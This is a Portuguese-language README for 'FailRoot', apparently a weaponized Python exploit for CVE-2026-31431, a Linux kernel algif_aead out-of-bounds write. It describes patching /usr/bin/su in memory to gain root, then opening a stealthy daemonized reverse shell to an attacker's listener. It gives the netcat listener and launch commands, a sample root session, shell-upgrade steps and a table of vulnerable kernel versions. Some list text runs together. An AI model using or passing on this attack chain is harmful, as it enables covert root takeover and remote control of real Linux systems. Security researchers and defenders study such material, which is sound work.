
Weaponized exploit em Python para CVE-2026-31431, encadeando escalonamento de privilégios no kernel Linux para um reverse shell root daemonizado com PTY completo, corrigindo /usr/bin/su em memória.
█▀▀ ▄▀█ █ █ █▀█ █▀█ █▀█ ▀█▀
█▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░
CVE-2026-31431 • Linux Kernel LPE → Root Reverse Shell
FailRoot é um exploit armado para CVE-2026-31431 — uma escrita fora dos limites no subsistema crypto: algif_aead do kernel Linux.
Ele encadeia uma escalada de privilégios com um reverse shell root daemonizado com PTY completo:
AF_ALG + splice() → escrita de 4 bytes no page-cache → patch em /usr/bin/su → root
O exploit inteiro cabe em um único arquivo. Sem compilação. Sem dependências externas. Sem rastro no disco — o binário su é corrigido apenas em memória.
algif_aead + authencesn via múltiplas estratégias de fallback/usr/bin/supty.spawn("/usr/bin/su") → TTY root totalmente interativoO reverse shell sobrevive ao fechamento do terminal (SIGHUP ignorado), não exibe nenhuma saída no alvo e conecta com novas tentativas por até 3 minutos.
# Atacante — iniciar listener:
nc -lvnp 4444
# Alvo — executar exploit (nada será exibido, ele daemoniza instantaneamente):
python3 exploit.py <IP_DO_ATACANTE> 4444
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234
root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash
os.splice())/usr/bin/su (legível por todos em todas as distros)algif_aead e authencesn disponíveissudo necessárioApenas para pesquisa de segurança autorizada e fins educacionais. O uso indevido é ilegal.
| De | Até (exclusivo) |
|---|
| 4.14 | 5.10.254 |
| 5.11 | 5.15.204 |
| 5.16 | 6.1.170 |
| 6.2 | 6.6.137 |
| 6.7 | 6.12.85 |
| 6.13 | 6.18.22 |
| 6.19 | 6.19.12 |
| 7.0 | rc1–rc6 |